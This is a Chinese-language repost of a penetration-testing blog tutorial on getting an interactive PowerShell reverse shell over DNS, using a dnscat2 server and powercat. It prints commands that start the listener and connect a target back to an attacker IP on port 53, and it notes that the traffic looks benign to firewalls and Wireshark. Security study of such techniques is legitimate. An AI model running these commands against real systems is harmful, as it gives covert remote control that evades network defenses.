摘自：http://www.freebuf.com/sectool/90616.html

欢迎来到一周PowerShell脚本的第五天，今天我们将讨论使用ICMP和DNS的交互式PowerShell脚本。

通常情况下防火墙都不会主动过滤ICMP和DNS数据包，这就让我们可以使用它们。下面就让我们来看看具体怎么利用吧。

对于DNS来说，我们需要使用Ron Bowes的dnscat2(https://github.com/iagox86/dnscat2)作为服务端。当然如果目标机器是Windows系统，那么也可以使用powercat(https://github.com/besimorhino/powercat)。我们之前讨论过使用powercat了，那么下面来看看如何使用dnscat2。

首先，使用如下命令开启dnscat2服务端：

root@Kali:~/Desktop# ruby ./dnscat2.rb reversedns-shell.org

然后使用如下命令返回连接：

PS C:\> powercat -c 192.168.254.226 -p 53 -dns reversedns-shell.org

效果如下：

很好！我们得到了一个通过DNS信道传输的交互式PowerShell脚本。

这里如果我们查看Wireshark的话不会发现有什么问题：

pcap包可以在这里下载到https://drive.google.com/folderview?id=0B-Hsu8q12kG3fmV6YUpOOVJzaC05cnRRZ3huV2xZUkNlOHplSkFqZ0VjVFNpU2NTZGpUN1E&usp=sharing

(注：译者已将数据包搬运到国内云盘：链接：http://pan.baidu.com/s/1c1dBnCO 密码：59oy)

上面的不是PowerShell脚本对吧，其实Nishang有一些使用DNS的脚本可以执行命令、脚本和msf的shellcode利用，但它们都不是交互式的脚本，所以这里就不提了，如果感兴趣可以查看之前的博文http://www.labofapenetrationtester.com/2015/01/fun-with-dns-txt-records-and-powershell.html。

最新文章

1. PHP导入导出excel表格图片(转)
2. 仅此一文让你明白ASP.NET MVC 之View的显示（仅此一文系列二）
3. 使用mac 终端利用alias设置快捷命令
4. NEWS - InstallShield 2014正式发布
5. Linux时间不准确的问题![转]
6. res/drawable目录
7. 【tyvj1463】智商问题 [分块][二分查找]
8. MySQL 优化实施方案
9. 通过Chocolatey软件包管理器安装.NET Core
10. DAY11-Java中的类--接上篇
11. BZOJ 3994: [SDOI2015]约数个数和 [莫比乌斯反演 转化]
12. .net开源工作流引擎ccflow表单数据返回值Pop分组模式和表格模式对比
13. IDEA快捷键积累
14. 《Java大学教程》--第2章 选择
15. es-02-elasticsearch安装及遇到的问题
16. 【Scala】Scala-case-参考资料
17. 很清晰的解读i2c协议
18. 2015306 白皎 《网络攻防》Exp4 恶意代码分析
19. cocos2d-x 2.2 创建项目
20. JAVA数字特征值

热门文章

1. ASP.NET-datatable转换成list对象
2. ubuntu下使用Nexus搭建Maven私服
3. Maven导入ojdbc14.jar和ojdbc6.jar
4. pintos操作系统thread部分的实现
5. 数据挖掘算法学习（四）PCA算法
6. uva 10641 (来当雷锋的这回....)
7. keras安装及使用
8. zzulioj--1719--小胖的疑惑(整数划分+dp打表)
9. VMware虚拟机ubuntu显示屏幕太小解决办法
10. pip更新问题